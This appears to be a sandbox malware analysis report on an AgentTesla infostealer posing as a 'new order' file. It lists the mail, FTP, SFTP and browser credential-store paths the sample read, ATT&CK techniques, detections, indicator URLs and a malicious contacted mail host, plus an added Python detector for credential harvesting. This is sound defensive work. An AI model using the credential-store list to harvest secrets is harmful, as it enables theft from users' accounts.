C:\Windows\Fonts\LBRITEDI.TTF
C:\Windows\Fonts\LCALLIG.TTF
C:\Windows\Fonts\LFAX.TTF
C:\Windows\Fonts\LFAXD.TTF
C:\Windows\Fonts\LFAXI.TTF
C:\Windows\Fonts\LFAXDI.TTF
C:\Windows\Fonts\MAGNETOB.TTF
C:\Windows\Fonts\MATURASC.TTF
C:\Windows\Fonts\MOD20.TTF
C:\Windows\Fonts\NIAGENG.TTF
C:\Windows\Fonts\NIAGSOL.TTF
C:\Windows\Fonts\OLDENGL.TTF
C:\Windows\Fonts\ONYX.TTF
C:\Windows\Fonts\PARCHM.TTF
C:\Windows\Fonts\PLAYBILL.TTF
C:\Windows\Fonts\POORICH.TTF
C:\Windows\Fonts\RAVIE.TTF
C:\Windows\Fonts\INFROMAN.TTF
C:\Windows\Fonts\SHOWG.TTF
C:\Windows\Fonts\SNAP____.TTF
C:\Windows\Fonts\STENCIL.TTF
C:\Windows\Fonts\VINERITC.TTF
C:\Windows\Fonts\VIVALDII.TTF
C:\Windows\Fonts\VLADIMIR.TTF
C:\Windows\Fonts\LATINWD.TTF
C:\Windows\Fonts\TCM_____.TTF
C:\Windows\Fonts\TCMI____.TTF
C:\Windows\Fonts\TCB_____.TTF
C:\Windows\Fonts\TCBI____.TTF
C:\Windows\Fonts\TCCM____.TTF
C:\Windows\Fonts\TCCB____.TTF
C:\Windows\Fonts\TCCEB.TTF
C:\Windows\Fonts\SCRIPTBL.TTF
C:\Windows\Fonts\ROCK.TTF
C:\Windows\Fonts\ROCKI.TTF
C:\Windows\Fonts\ROCKB.TTF
C:\Windows\Fonts\ROCKEB.TTF
C:\Windows\Fonts\ROCKBI.TTF
C:\Windows\Fonts\ROCC____.TTF
C:\Windows\Fonts\ROCCB___.TTF
C:\Windows\Fonts\RAGE.TTF
C:\Windows\Fonts\PERTILI.TTF
C:\Windows\Fonts\PERTIBD.TTF
C:\Windows\Fonts\PER_____.TTF
C:\Windows\Fonts\PERI____.TTF
C:\Windows\Fonts\PERB____.TTF
C:\Windows\Fonts\PERBI___.TTF
C:\Windows\Fonts\PALSCRI.TTF
C:\Windows\Fonts\OCRAEXT.TTF
C:\Windows\Fonts\MAIAN.TTF
C:\Windows\Fonts\LTYPE.TTF
C:\Windows\Fonts\LTYPEO.TTF
C:\Windows\Fonts\LTYPEB.TTF
C:\Windows\Fonts\LTYPEBO.TTF
C:\Windows\Fonts\LSANS.TTF
C:\Windows\Fonts\LSANSD.TTF
C:\Windows\Fonts\LSANSI.TTF
C:\Windows\Fonts\LSANSDI.TTF
C:\Windows\Fonts\IMPRISHA.TTF
C:\Windows\Fonts\HATTEN.TTF
C:\Windows\Fonts\GOUDYSTO.TTF
C:\Windows\Fonts\GOUDOS.TTF
C:\Windows\Fonts\GOUDOSI.TTF
C:\Windows\Fonts\GOUDOSB.TTF
C:\Windows\Fonts\GLECB.TTF
C:\Windows\Fonts\GIL_____.TTF
C:\Windows\Fonts\GILI____.TTF
C:\Windows\Fonts\GILB____.TTF
C:\Windows\Fonts\GILBI___.TTF
C:\Windows\Fonts\GILC____.TTF
C:\Windows\Fonts\GLSNECB.TTF
C:\Windows\Fonts\GIGI.TTF
C:\Windows\Fonts\FRABK.TTF
C:\Windows\Fonts\FRABKIT.TTF
C:\Windows\Fonts\FORTE.TTF
C:\Windows\Fonts\FELIXTI.TTF
C:\Windows\Fonts\ERASMD.TTF
C:\Windows\Fonts\ERASLGHT.TTF
C:\Windows\Fonts\ERASDEMI.TTF
C:\Windows\Fonts\ERASBD.TTF
C:\Windows\Fonts\ENGR.TTF
C:\Windows\Fonts\ELEPHNT.TTF
C:\Windows\Fonts\ELEPHNTI.TTF
C:\Windows\Fonts\ITCEDSCR.TTF
C:\Windows\Fonts\CURLZ___.TTF
C:\Windows\Fonts\COPRGTL.TTF
C:\Windows\Fonts\COPRGTB.TTF
C:\Windows\Fonts\CENSCBK.TTF
C:\Windows\Fonts\SCHLBKI.TTF
C:\Windows\Fonts\SCHLBKB.TTF
C:\Windows\Fonts\SCHLBKBI.TTF
C:\Windows\Fonts\CASTELAR.TTF
C:\Windows\Fonts\CALIST.TTF
C:\Windows\Fonts\CALISTI.TTF
C:\Windows\Fonts\CALISTB.TTF
C:\Windows\Fonts\CALISTBI.TTF
C:\Windows\Fonts\BOOKOS.TTF
C:\Windows\Fonts\BOOKOSB.TTF
C:\Windows\Fonts\BOOKOSI.TTF
C:\Windows\Fonts\BOOKOSBI.TTF
C:\Windows\Fonts\BOD_R.TTF
C:\Windows\Fonts\BOD_I.TTF
C:\Windows\Fonts\BOD_B.TTF
C:\Windows\Fonts\BOD_BI.TTF
C:\Windows\Fonts\BOD_CR.TTF
C:\Windows\Fonts\BOD_BLAR.TTF
C:\Windows\Fonts\BOD_CI.TTF
C:\Windows\Fonts\BOD_CB.TTF
C:\Windows\Fonts\BOD_BLAI.TTF
C:\Windows\Fonts\BOD_CBI.TTF
C:\Windows\Fonts\ITCBLKAD.TTF
C:\Windows\Fonts\ARLRDBD.TTF
C:\Windows\Fonts\AGENCYR.TTF
C:\Windows\Fonts\AGENCYB.TTF
C:\Windows\Fonts\BSSYM7.TTF
C:\Windows\Fonts\REFSAN.TTF
C:\Windows\Fonts\REFSPCL.TTF
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

Source process for the file and registry accesses below: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe

Yara detected AgentTesla
  Yara match, file source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.6.unpack (type: UNPACKEDPE)
  Yara match, file source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.10.unpack (type: UNPACKEDPE)
  Yara match, file source: 0.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.3922928.4.raw.unpack (type: UNPACKEDPE)
  Yara match, file source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.8.unpack (type: UNPACKEDPE)
  Yara match, file source: 0.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.38ecb08.2.unpack (type: UNPACKEDPE)
  Yara match, file source: 5.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.0.unpack (type: UNPACKEDPE)
  Yara match, file source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.4.unpack (type: UNPACKEDPE)
  Yara match, file source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.12.unpack (type: UNPACKEDPE)
  Yara match, file source: 0.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.38ecb08.2.raw.unpack (type: UNPACKEDPE)
  Yara match, file source: 0.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.3806288.3.raw.unpack (type: UNPACKEDPE)
  Yara match, file source: 00000005.00000000.282084634.0000000000402000.00000040.00000001.sdmp (type: MEMORY)
  Yara match, file source: 00000005.00000000.283151659.0000000000402000.00000040.00000001.sdmp (type: MEMORY)
  Yara match, file source: 00000000.00000002.290045970.0000000003769000.00000004.00000001.sdmp (type: MEMORY)
  Yara match, file source: 00000005.00000002.517392444.0000000000402000.00000040.00000001.sdmp (type: MEMORY)
  Yara match, file source: 00000005.00000000.284209429.0000000000402000.00000040.00000001.sdmp (type: MEMORY)
  Yara match, file source: 00000005.00000000.284592595.0000000000402000.00000040.00000001.sdmp (type: MEMORY)
  Yara match, file source: 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmp (type: MEMORY)
  Yara match, file source: Process Memory Space: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe PID: 4252 (type: MEMORYSTR)
  Yara match, file source: Process Memory Space: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe PID: 4792 (type: MEMORYSTR)

Tries to steal Mail credentials (via file / registry access)
  File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (opened twice)
  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
  Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal ftp login credentials
  File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
  File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\

Tries to harvest and steal browser information (history, passwords, etc)
  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
  Yara match, file source: 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmp (type: MEMORY)
  Yara match, file source: Process Memory Space: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe PID: 4792 (type: MEMORYSTR)
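The file and registry paths listed under the four credential-theft signatures above are the most reusable artefacts in this section: one process touching the Thunderbird, Outlook, IncrediMail, WinSCP, FileZilla, SmartFTP, Chrome and Firefox stores in a single run is the harvesting pattern, independent of which AgentTesla build produced it. The Python below is an added example, not part of the Joe Sandbox report: it takes behaviour lines in the report's own shape (or an EDR file/registry-access log converted to that shape), normalises the per-user profile prefix and registry hive, matches each path against the store locations this sample touched, and counts how many distinct credential categories one process reached. The category names, the `%APPDATA%` / `%LOCALAPPDATA%` tokens and the two-category threshold are the example's own choices, not something the report defines.

```python
"""Classify sandbox 'File opened' / 'Key opened' events against known credential stores.

Added example, not part of the Joe Sandbox report. The store table is generalised from
the paths this sample touched; the category names and the threshold are assumptions.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

# (regex applied after normalise(), category, application)
CREDENTIAL_STORES: List[Tuple[str, str, str]] = [
    (r"^%APPDATA%\\Thunderbird\\profiles\.ini$", "mail", "Thunderbird"),
    (r"^HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\"
     r"Windows Messaging Subsystem\\Profiles\\", "mail", "Outlook"),
    (r"^HKCU\\Software\\IncrediMail\\Identities$", "mail", "IncrediMail"),
    (r"^HKCU\\SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions$", "sftp", "WinSCP"),
    (r"^%APPDATA%\\FileZilla\\recentservers\.xml$", "ftp", "FileZilla"),
    (r"^%APPDATA%\\SmartFTP\\Client 2\.0\\Favorites\\", "ftp", "SmartFTP"),
    (r"^%LOCALAPPDATA%\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$", "browser", "Chrome"),
    (r"^%APPDATA%\\Mozilla\\Firefox\\profiles\.ini$", "browser", "Firefox"),
]

# Accepts the report's own line shape, with or without the trailing "Jump to behavior" link text.
EVENT_RE = re.compile(r"(File opened|Key opened): (.+?)(?:Jump to behavior)?\s*$")


def normalise(path: str) -> str:
    """Collapse the per-user profile prefix and the registry hive name so one pattern
    covers every user name and both spellings of the hive."""
    path = re.sub(r"^C:\\Users\\[^\\]+\\AppData\\Roaming", "%APPDATA%", path, flags=re.I)
    path = re.sub(r"^C:\\Users\\[^\\]+\\AppData\\Local", "%LOCALAPPDATA%", path, flags=re.I)
    path = re.sub(r"^HKEY_CURRENT_USER", "HKCU", path, flags=re.I)
    return path


def classify(path: str) -> Optional[Tuple[str, str]]:
    """Return (category, application) if the path is a known credential store, else None."""
    norm = normalise(path)
    for pattern, category, app in CREDENTIAL_STORES:
        if re.search(pattern, norm, flags=re.I):
            return category, app
    return None


def triage(lines: List[str]) -> Dict[str, Set[str]]:
    """Map each credential category to the applications whose stores were opened."""
    hits: Dict[str, Set[str]] = defaultdict(set)
    for line in lines:
        m = EVENT_RE.search(line)
        if not m:
            continue
        result = classify(m.group(2).strip())
        if result is not None:
            category, app = result
            hits[category].add(app)
    return dict(hits)


def looks_like_infostealer(hits: Dict[str, Set[str]], min_categories: int = 2) -> bool:
    """One application reading its own store is normal; a single process reaching into
    mail, FTP and browser stores is the harvesting pattern. The threshold is an assumption."""
    return len(hits) >= min_categories


# Lines copied from the report above, plus one constructed benign font access for contrast.
REPORT_LINES = [
    r"File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini",
    r"File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior",
    r"Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676",
    r"Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities",
    r"Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions",
    r"File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml",
    r"File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior",
    r"File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini",
    r"File opened: C:\Windows\Fonts\comic.ttf",  # constructed: benign, must not match
]

if __name__ == "__main__":
    found = triage(REPORT_LINES)
    for category, apps in sorted(found.items()):
        print(f"{category:8s} {', '.join(sorted(apps))}")
    print("infostealer pattern:", looks_like_infostealer(found))
```

Run against the report's lines the classifier returns four categories (mail, sftp, ftp, browser) across eight applications, while the font access is ignored; a single legitimate client opening only its own store stays below the threshold. Extending the table is a matter of adding a pattern per store; the normalisation step is what keeps one pattern valid across user names and alternative Chrome profiles.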

Remote Access Functionality:

Yara detected AgentTesla
  The same nineteen Yara matches (ten UNPACKEDPE, seven MEMORY, two MEMORYSTR) as listed under Stealing of Sensitive Information above.

Mitre Att&ck Matrix

Technique names followed by a number in parentheses are the cells the analysis matched; the number is the report's hit-count badge, reproduced as printed (the page runs badge digits together, so a value such as 211 may be more than one badge). The remaining entries are the unmatched cells of the matrix.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise (no match)
Execution: Windows Management Instrumentation (211); Scheduled Task/Job (1); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Scheduled Task/Job (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (112); Scheduled Task/Job (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (3); Timestomp (1); Masquerading (1); Virtualization/Sandbox Evasion (131); Process Injection (112)
Credential Access: OS Credential Dumping (2); Credentials in Registry (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: File and Directory Discovery (1); System Information Discovery (114); Query Registry (1); Security Software Discovery (311); Process Discovery (2); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); Remote System Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot (no match)
Collection: Archive Collected Data (11); Data from Local System (2); Email Collection (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol (no match)
Command and Control: Encrypted Channel (1); Non-Standard Port (1); Non-Application Layer Protocol (1); Application Layer Protocol (11); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols (no match)
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups (no match)
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue (no match)

Behavior Graph (image not reproduced)

Screenshots (images not reproduced)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | 41% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | 100% | Joe Sandbox ML | (none)

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\aUkURZiJ.exe | 100% | Joe Sandbox ML | (none)
C:\Users\user\AppData\Roaming\aUkURZiJ.exe | 41% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

The dropped file carries the same ReversingLabs ratio and label as the submitted sample.

Unpacked PE Files

Source | Detection | Scanner | Label
5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.12.unpack | 100% | Avira | TR/Spy.Gen8
5.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8
5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.10.unpack | 100% | Avira | TR/Spy.Gen8
5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen8

                      Domains

                      No Antivirus matches

URLs

All 56 entries below were rated 0% / safe by the scanner named. Nearly all are font-foundry addresses (fontbureau.com, jiyu-kobo.co.jp, urwpp.de, tiro.com, founder.com.cn, galapagosdesign.com and similar) read from the metadata of the TrueType files the process enumerated, often with trailing bytes from adjacent memory; they have no investigative value. The entries worth keeping are http://mail.kyowasecurity.com.sg (the contacted host in the next section), the two Tor Browser download URLs, http://DynDns.comDynDNS and http://127.0.0.1:HTTP/1.1, which are embedded program strings rather than font metadata.

Source | Scanner
http://www.urwpp.demM | Avira URL Cloud
http://127.0.0.1:HTTP/1.1 | Avira URL Cloud
http://www.founder.com.cn/cn/bThe | URL Reputation
http://www.jiyu-kobo.co.jp/ys; | Avira URL Cloud
http://www.jiyu-kobo.co.jp/Y0y | Avira URL Cloud
http://www.tiro.com | URL Reputation
http://www.fontbureau.comI.TTFks | Avira URL Cloud
http://www.fontbureau.comessed3sm | Avira URL Cloud
http://www.fontbureau.comessed | URL Reputation
http://www.goodfont.co.kr | URL Reputation
http://www.tiro.comD | Avira URL Cloud
http://www.urwpp.de.T | Avira URL Cloud
http://www.sajatypeworks.com | URL Reputation
http://www.typography.netD | URL Reputation
http://www.founder.com.cn/cn/cThe | URL Reputation
http://www.jiyu-kobo.co.jp/ks | Avira URL Cloud
http://www.galapagosdesign.com/staff/dennis.htm | URL Reputation
http://www.jiyu-kobo.co.jp/ch | Avira URL Cloud
http://fontfabrik.com | URL Reputation
http://www.fontbureau.comttv | Avira URL Cloud
http://www.jiyu-kobo.co.jp// | URL Reputation
http://www.galapagosdesign.com/DPlease | URL Reputation
http://www.jiyu-kobo.co.jp/) | URL Reputation
http://www.sandoll.co.kr | URL Reputation
http://www.urwpp.deDPlease | URL Reputation
http://www.urwpp.de | URL Reputation
http://www.zhongyicts.com.cn | URL Reputation
http://www.sakkal.com | URL Reputation
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | URL Reputation
http://www.fontbureau.comtuta | Avira URL Cloud
http://www.fontbureau.com= | Avira URL Cloud
http://www.jiyu-kobo.co.jp/OsI | Avira URL Cloud
http://www.fontbureau.comsiva | URL Reputation
http://mail.kyowasecurity.com.sg | Avira URL Cloud
http://www.galapagosdesign.com/ | URL Reputation
http://DynDns.comDynDNS | URL Reputation
http://www.fontbureau.comF | URL Reputation
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | URL Reputation
http://KpGsSw.com | Avira URL Cloud
http://www.urwpp.deF | URL Reputation
http://www.fontbureau.comVsF | Avira URL Cloud
http://www.fontbureau.comzana | Avira URL Cloud
http://www.jiyu-kobo.co.jp/jp/ | URL Reputation
http://www.fontbureau.coma | URL Reputation
http://www.fontbureau.comd | URL Reputation
http://www.carterandcone.coml | URL Reputation
http://www.founder.com.cn/cn/ | URL Reputation
http://www.founder.com.cn/cn | URL Reputation
http://www.jiyu-kobo.co.jp/ms | Avira URL Cloud
http://www.fontbureau.comcomF | URL Reputation
http://www.jiyu-kobo.co.jp/ | URL Reputation
http://www.fontbureau.comdrs | Avira URL Cloud
http://www.jiyu-kobo.co.jp/jp/OsI | Avira URL Cloud
http://www.jiyu-kobo.co.jp/a | URL Reputation
http://www.jiyu-kobo.co.jp/VsF | Avira URL Cloud
http://www.galapagosdesign.com/3sm | Avira URL Cloud

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.kyowasecurity.com.sg | 113.197.35.43 | true | true | (none) | unknown

The report marks this host malicious although the URL reputation services above return safe for it; the host name is a mail server, which fits AgentTesla's SMTP-based exfiltration, but the protocol and port are not shown in this section.

URLs from Memory and Binaries

All memory dumps listed belong to the process new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.

Name | Memory dump(s) | Malicious | Antivirus Detection | Reputation
http://www.urwpp.demM | 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://127.0.0.1:HTTP/1.1 | 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.fontbureau.com/designersG | 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp | false | (none) | high
http://www.fontbureau.com/designers/? | 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp | false | (none) | high
http://www.founder.com.cn/cn/bThe | 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp | false | (none) | high
http://www.jiyu-kobo.co.jp/ys; | 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp; 00000000.00000003.250373934.0000000005663000.00000004.00000001.sdmp; 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designersW | 00000000.00000003.261091046.0000000005699000.00000004.00000001.sdmp; 00000000.00000003.261061221.0000000005699000.00000004.00000001.sdmp | false | (none) | high
http://www.jiyu-kobo.co.jp/Y0y | 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp; 00000000.00000003.248682275.000000000566E000.00000004.00000001.sdmp; 00000000.00000003.248549588.000000000569A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comI.TTFks | 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp; 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmp; 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp; 00000000.00000003.256055028.000000000566E000.00000004.00000001.sdmp; 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers | 00000000.00000003.255044284.0000000005699000.00000004.00000001.sdmp; 00000000.00000003.261125302.0000000005699000.00000004.00000001.sdmp; 00000000.00000003.253788835.0000000005699000.00000004.00000001.sdmp; 00000000.00000003.253886398.0000000005699000.00000004.00000001.sdmp; 00000000.00000003.252653993.0000000005699000.00000004.00000001.sdmp | false | (none) | high
http://www.fontbureau.comessed3sm | 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp; 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp; 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
